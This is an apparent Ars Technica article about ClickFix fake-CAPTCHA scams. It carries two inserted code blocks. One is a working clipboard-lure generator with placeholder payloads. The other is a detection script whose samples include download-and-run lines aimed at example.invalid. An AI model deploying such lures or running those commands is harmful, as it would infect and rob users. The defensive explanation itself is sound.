COPY, PASTE, INFECT

ClickFix may be the biggest security threat your family has never heard of

Relatively new technique can bypass many endpoint protections.

Dan Goodin

Over the past year, scammers have ramped up a new way to infect the computers of unsuspecting people. The increasingly common method, which many potential targets have yet to hear of, is quick, slips past many endpoint protections, and works against both macOS and Windows users.

ClickFix often starts with an email that appears to come from a hotel where the target has a pending reservation and that quotes the correct booking details. In other cases, the attack begins with a WhatsApp message. In still others, the malicious URL turns up at the top of Google results for a search query. Once the mark lands on the site, it presents a CAPTCHA challenge or some other pretext that requires user confirmation. The user is told to copy a string of text, open a terminal window (on Windows, often the Win+R Run dialog), paste the string in, and press Enter.

One line is all it takes

Once entered, the string causes the PC or Mac to silently contact an attacker-controlled server, download malware, and run it, with no indication to the target that anything has happened. With that, the user is infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. Three factors drive the growth: few people know the technique exists, the lure arrives from addresses the target already trusts or from search results, and the pasted command runs as the user through tools already on the machine, so some endpoint protections never see it.

“This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors,” researchers from CrowdStrike wrote in a report documenting a particularly polished campaign designed to infect Macs with a Mach-O executable, the native binary format on macOS. “Promoting false malicious websites encourages more site traffic, which will lead to more potential victims. The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim’s machine while bypassing Gatekeeper checks.”

The primary payload in that campaign is a credential stealer tracked as Shamos. Other payloads included a malicious cryptocurrency wallet, software that enrolls the Mac in a botnet, and macOS configuration changes that make the malware run again each time the machine reboots.

Another campaign, documented by Sekoia, targeted Windows users. The attackers behind it first compromise a hotel’s account with Booking.com or another online travel service. Using the reservation data stored in those accounts, they contact guests with pending stays. Because the message references a real booking, it earns immediate trust from many targets, who are eager to follow instructions lest their stay be canceled.

The site eventually presents a fake CAPTCHA prompt that looks almost identical to the human-verification checks that content delivery network Cloudflare places in front of many websites. The “proof” that there is a human at the keyboard is to copy a string of text and paste it into the Windows Run dialog or a terminal window. With that, the machine is infected with malware tracked as PureRAT.

Push Security, meanwhile, reported a ClickFix campaign whose page was “adapting to the device that you’re visiting from”: depending on the visitor’s OS, it delivers a Windows or a macOS payload. Many of the pasted commands, Microsoft said, invoke LOLBins, short for living-off-the-land binaries: legitimate programs that ship with the operating system, such as PowerShell or the system shell, rather than anything the attacker has to install first. The first stage is a script that runs entirely through those native tools, typically in memory; until it fetches the real payload, no malicious file is written to disk, which leaves file-scanning endpoint protection with nothing to inspect.

The commands, often Base64-encoded so they mean nothing to a human reader, are placed on the clipboard by script running inside the browser sandbox, the isolated environment browsers use to keep web content away from the rest of the device. Because nothing is downloaded or written to disk at that point, the browser’s download warnings and many endpoint tools have nothing to observe or flag; the first event they can see is the user’s own keystrokes launching a native program.
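The mechanics behind the last three paragraphs (the OS-adaptive page, the Base64 wrapping, and the clipboard write that no download scanner sees), as an added example written for this page; it is not code from the article or from any of the vendor reports it cites. The two commands it would put on the clipboard are harmless placeholders that only print a word, and the button id, the two user-agent checks, and the PowerShell flag abbreviations are assumptions; a real lure would carry a download-and-run one-liner in their place.

```javascript
// Added example, not the article's or any vendor's code. Run with Node for the
// pure functions; the DOM glue at the bottom only activates inside a browser.

// Placeholder inner scripts (assumption: a real lure uses a download-and-run
// one-liner here). They are what the victim ends up executing.
const PLACEHOLDER_SCRIPTS = {
  windows: 'Write-Host placeholder',   // PowerShell script
  macos: 'echo placeholder',           // POSIX shell script
};

// Pick a platform from the User-Agent string: the "adapting to the device
// you're visiting from" step. Anything else gets no command at all.
function pickPlatform(userAgent) {
  const ua = String(userAgent || '');
  if (/Windows NT/.test(ua)) return 'windows';
  if (/Macintosh|Mac OS X/.test(ua)) return 'macos';
  return 'other';
}

// Wrap the script so the clipboard text is unreadable to a human.
// Windows: powershell -EncodedCommand (-enc) takes Base64 of UTF-16LE text,
// -w hidden keeps the console from flashing up, -nop skips the profile.
// macOS: echo <b64> | base64 -d | sh.
function wrapForClipboard(platform, script) {
  if (platform === 'windows') {
    const b64 = Buffer.from(script, 'utf16le').toString('base64');
    return `powershell -w hidden -nop -enc ${b64}`;
  }
  if (platform === 'macos') {
    const b64 = Buffer.from(script, 'utf8').toString('base64');
    return `echo ${b64} | base64 -d | sh`;
  }
  return null;
}

// What the page shows vs. what it puts on the clipboard. The visible text is
// the fake CAPTCHA; the clipboard text is never displayed before the paste.
function buildLure(userAgent) {
  const platform = pickPlatform(userAgent);
  const clipboardText = platform === 'other'
    ? null
    : wrapForClipboard(platform, PLACEHOLDER_SCRIPTS[platform]);
  const steps = platform === 'windows'
    ? ['Press Win+R', 'Press Ctrl+V', 'Press Enter']
    : platform === 'macos'
      ? ['Open Terminal', 'Press Cmd+V', 'Press Enter']
      : [];
  return { platform, visibleText: 'Verify you are human', clipboardText, steps };
}

// Browser glue (assumption: a button with id "verify-btn" exists). Clicking it
// writes the command to the clipboard; nothing is downloaded, so download
// scanners and the browser's own warnings have nothing to act on.
if (typeof document !== 'undefined' && typeof navigator !== 'undefined') {
  const lure = buildLure(navigator.userAgent);
  const btn = document.getElementById('verify-btn');
  if (btn && lure.clipboardText !== null) {
    btn.addEventListener('click', () => navigator.clipboard.writeText(lure.clipboardText));
  }
}

// Stand-alone demo output when run under Node.
if (typeof document === 'undefined') {
  const demo = buildLure('Mozilla/5.0 (Windows NT 10.0; Win64; x64)');
  console.log(demo.steps.join(' > '), '\n', demo.clipboardText);
}
```

The point to take from it is how little the page has to do: one clipboard write, no download, no exploit, and the rest is the victim's own keystrokes running a signed system binary.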

The attacks are also effective because of the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messaging apps. In many users’ minds, that caution does not extend to a site that tells them to copy a piece of text and paste it into an unfamiliar window. When the instructions arrive in an email from a hotel they have booked or at the top of Google results, targets are caught further off guard.

With many families gathering in the coming weeks for holiday dinners, ClickFix scams are worth mentioning to the relatives who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but in some cases they can be bypassed. For now, awareness is the best countermeasure.
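A defender-side counterpart, added for this page and not drawn from the article or from any vendor tool: a triage function for command lines that a ClickFix victim may have pasted. Where the lines come from is an assumption (the Windows RunMRU registry key, a shell history file, or process-creation telemetry); the function peels off the two wrappers described above, PowerShell -EncodedCommand and echo | base64 -d, and flags the traits the lures share. The xattr indicator assumes that the Gatekeeper bypass mentioned in the CrowdStrike quote is done by clearing the quarantine attribute, which the article does not spell out. The sample command lines are constructed for the demo and point at the reserved .invalid domain.

```javascript
// Added example, not from the article or any vendor report. Triage of pasted
// command lines; the sample lines at the bottom are constructed for the demo.

// Words that fetch something from the network / that execute what was fetched.
const DOWNLOADER = /\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b/i;
const EXECUTOR   = /\b(?:iex|invoke-expression|bash|zsh|sh|mshta|regsvr32|rundll32)\b/i;

// One entry per trait. Each is checked against every layer of a command: the
// raw text and, if one can be extracted, the decoded inner script.
const INDICATORS = [
  { name: 'hidden-window',     test: s => /-w(?:indowstyle)?\s+hidden\b/i.test(s) },
  { name: 'encoded-command',   test: s => /-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}/i.test(s) },
  { name: 'base64-to-shell',   test: s => /base64\s+(?:-d|--decode)\s*\|\s*(?:ba|z)?sh\b/i.test(s) },
  { name: 'mshta-remote',      test: s => /\bmshta(?:\.exe)?\s+["']?https?:/i.test(s) },
  { name: 'download-and-run',  test: s => DOWNLOADER.test(s) && EXECUTOR.test(s) },
  // Assumption: Gatekeeper is sidestepped by stripping the quarantine attribute.
  { name: 'quarantine-bypass', test: s => /\bxattr\b.*?(?:\s-c\b|com\.apple\.quarantine)/i.test(s) },
];

// Pull the hidden layer out of the two wrappers the article describes:
// PowerShell -EncodedCommand (Base64 of UTF-16LE) and `echo <b64> | base64 -d`.
function decodeInner(cmd) {
  let m = cmd.match(/-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})/i);
  if (m) return Buffer.from(m[1], 'base64').toString('utf16le');
  m = cmd.match(/echo\s+["']?([A-Za-z0-9+/=]{16,})["']?\s*\|\s*base64/i);
  if (m) return Buffer.from(m[1], 'base64').toString('utf8');
  return null;
}

// Score one command line. Two independent traits together are rare in
// legitimate admin commands; one alone (e.g. the "curl | bash" installer
// habit) is worth a look but not a verdict. Thresholds are a starting point.
function analyzeCommand(cmd) {
  const decoded = decodeInner(cmd);
  const layers = decoded === null ? [cmd] : [cmd, decoded];
  const hits = [];
  for (const ind of INDICATORS) {
    if (layers.some(ind.test)) hits.push(ind.name);
  }
  const verdict = hits.length >= 2 ? 'suspicious' : hits.length === 1 ? 'review' : 'benign';
  return { verdict, hits, decoded };
}

// Constructed sample lines (not real telemetry). Hosts use the reserved
// .invalid TLD so nothing here can reach a live server.
const SAMPLE_COMMANDS = [
  // Windows lure: hidden, profile-less PowerShell running an encoded download-and-run.
  'powershell -w hidden -nop -enc ' +
    Buffer.from("iex (irm 'https://example.invalid/s')", 'utf16le').toString('base64'),
  // macOS lure: Base64-wrapped curl | bash.
  'echo ' + Buffer.from('curl -fsSL https://example.invalid/s | bash', 'utf8').toString('base64') +
    ' | base64 -d | bash',
  // Benign admin command.
  'powershell -NoProfile -Command Get-Service',
  // The plain "curl | bash" installer trope: one trait, flagged for review only.
  'curl -fsSL https://example.invalid/install.sh | bash',
];

function triage(commands) {
  return commands.map(c => ({ command: c.slice(0, 60), ...analyzeCommand(c) }));
}

for (const r of triage(SAMPLE_COMMANDS)) {
  console.log(`${r.verdict.padEnd(10)} [${r.hits.join(', ')}] ${r.command}`);
}
```

Running it over the four constructed lines marks the two lures as suspicious, the Get-Service call as benign, and the bare curl-pipe-bash as review; decoding the inner layer is what turns the Windows lure from "hidden window plus encoded blob" into a confirmed download-and-run.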

Dan Goodin Senior Security Editor
Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him on Mastodon and on Bluesky. Contact him on Signal at DanArs.82.
181 Comments
Staff Picks
p
Jesus God. Apparently I expect too much from people, given that this is apparently a thing that people actually do. And my expectations are already so low!
Looking at the linked sites, it's being presented as a way to fix a problem you already have with your machine, e.g. 'How to add a printer to your Mac': 'first plug in the printer. It should be autodetected in Add Printers. If so you're all good. If not, run this command...'

Given the tendency for genuine tech support (especially on Linux) to culminate in 'just run this opaque command to fix your problem' I can see it being potent - when users are asked to 'just run "sudo apt-get update ; sudo apt-get install libfoo-dev"' I can see how they might be hoodwinked into doing something malicious.

And let's not get started on the "curl | sudo bash" trope...
Cthel
The compromised hotel booking accounts is huge. With that kind of access it's easy to see how attackers might be doing all kinds of stuff.

But asking a user to copy-paste into the terminal? The typical user has no idea how to open the terminal. Most modern users can't even find the Start menu. The Venn diagram of "capable of opening the terminal" and "will fall for this attack" contains maybe a group of precocious twelve-year-olds, and that's about it.

If they compromised StackOverflow or ChatGPT, that would be a massively successful attack, because users will copy-paste shit from those sites blindly.
That's why the instructions say "press windows key+R then type/paste cmd and hit enter"

People who don't know what the terminal is are more likely to paste an inscrutable text string into the window that opens as a result, as they don't recognise the danger.
VividVerism
I am a retired home laptop user. I always sign in as 'standard windows user'. If I open the terminal and mindlessly copy/paste/return (run) - will Windows automatically ask for admin credentials before running the malicious code?
OK. I've read nearly 100 comments here so far.

Unless I'm missing something, doesn't this "just happen" require the current user to be running as an admin user or enter admin credentials at some point in the process?

I saw three comments referring to this but shouldn't an article like this be explicit in this bit of information.

Which is one reason I'll not work with people who refuse to operate day to day as a non-admin user.

No, any user can run basic commands in a terminal window or the Windows run dialog. No admin access is needed unless they are trying to install something to a location that needs admin access. Most of the things you care about the malware doing, like password theft, browser session hijacking, installing malicious browser extensions, ransomware to block access to your files, etc. can all be done without admin.
d
Jesus God. Apparently I expect too much from people, given that this is apparently a thing that people actually do. And my expectations are already so low!
You have no friends/relatives with neurodivergence? No friends/relatives with cognitive decline that occurs naturally in many people as they age? No friends/relatives who are so uncomfortable with the Internet that they don't know how to make informed decisions? No friends/relatives who are currently under emotional distress?

These are just a few of the things that make people fall for these scams. They often bear major humiliation and self blame afterward. Please make more of an attempt to show understanding and compassion.